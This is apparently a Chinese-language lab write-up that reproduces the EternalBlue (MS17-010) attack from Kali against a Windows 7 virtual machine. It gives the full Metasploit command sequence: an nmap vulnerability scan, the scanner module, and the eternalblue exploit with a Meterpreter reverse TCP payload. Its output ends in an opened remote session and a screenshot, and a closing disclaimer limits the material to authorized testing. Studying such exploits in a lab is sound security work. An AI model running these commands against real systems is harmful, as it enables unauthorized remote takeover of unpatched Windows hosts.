永恒之蓝漏洞复现

💡

LHSOT:kali(192.168.136.134) Rhost:Win7(192.168.136.140) 漏洞：永恒之蓝（ms17-010）

-使用nmap 探查目标主机漏洞


nmap --script=vuln 192.168.136.140

-启用Metasploit


┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit tip: Open an interactive Ruby terminal with irb
                                                  

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v6.4.50-dev                          ]
+ -- --=[ 2496 exploits - 1283 auxiliary - 431 post       ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

-search ms17-010


msf6 > search ms17-010

-加载扫描模块


msf6 > use auxiliary/scanner/smb/smb_ms17_010

-设置 set rhosts


msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.136.140
rhosts => 192.168.136.140

-exploit开始扫描漏洞


msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 192.168.136.140:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.136.140:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

-使用永恒之蓝攻击模块：exploit/windows/smb/ms17_010_eternalblue


msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp

-设置payload


msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

-设置rhosts


msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.136.140
rhosts => 192.168.136.140

-设置LHOST


msf6 exploit(windows/smb/ms17_010_eternalblue) > set  LHOST 192.168.136.134
LHOST => 192.168.136.134

-开始攻击run


msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.136.140:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.136.140:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > back
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.136.140
rhosts => 192.168.136.140
msf6 exploit(windows/smb/ms17_010_eternalblue) > set  LHOST 192.168.136.134
LHOST => 192.168.136.134
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.136.134:4444 
[*] 192.168.136.140:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.136.140:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.136.140:445   - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.136.140:445 - The target is vulnerable.
[*] 192.168.136.140:445 - Connecting to target for exploitation.
[+] 192.168.136.140:445 - Connection established for exploitation.
[+] 192.168.136.140:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.136.140:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.136.140:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.136.140:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.136.140:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.136.140:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.136.140:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.136.140:445 - Sending all but last fragment of exploit packet
[*] 192.168.136.140:445 - Starting non-paged pool grooming
[+] 192.168.136.140:445 - Sending SMBv2 buffers
[+] 192.168.136.140:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.136.140:445 - Sending final SMBv2 buffers.
[*] 192.168.136.140:445 - Sending last fragment of exploit packet!
[*] 192.168.136.140:445 - Receiving response from exploit packet
[+] 192.168.136.140:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.136.140:445 - Sending egg to corrupted connection.
[*] 192.168.136.140:445 - Triggering free of corrupted buffer.
[*] Sending stage (203846 bytes) to 192.168.136.140
[*] Meterpreter session 1 opened (192.168.136.134:4444 -> 192.168.136.140:49159) at 2025-05-19 11:51:28 -0400
[+] 192.168.136.140:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.136.140:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.136.140:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-捕获屏幕


meterpreter > screenshot
Screenshot saved to: /root/fPfKOTGx.jpeg

-查看文件

免责声明

本文仅用于网络安全学习和研究目的。请注意以下事项：

本文所述技术仅可用于授权测试环境

未经授权对任何系统进行渗透测试属于违法行为

使用本文所述技术造成的任何损失与作者无关

请遵守当地法律法规，提高安全意识，增强防护能力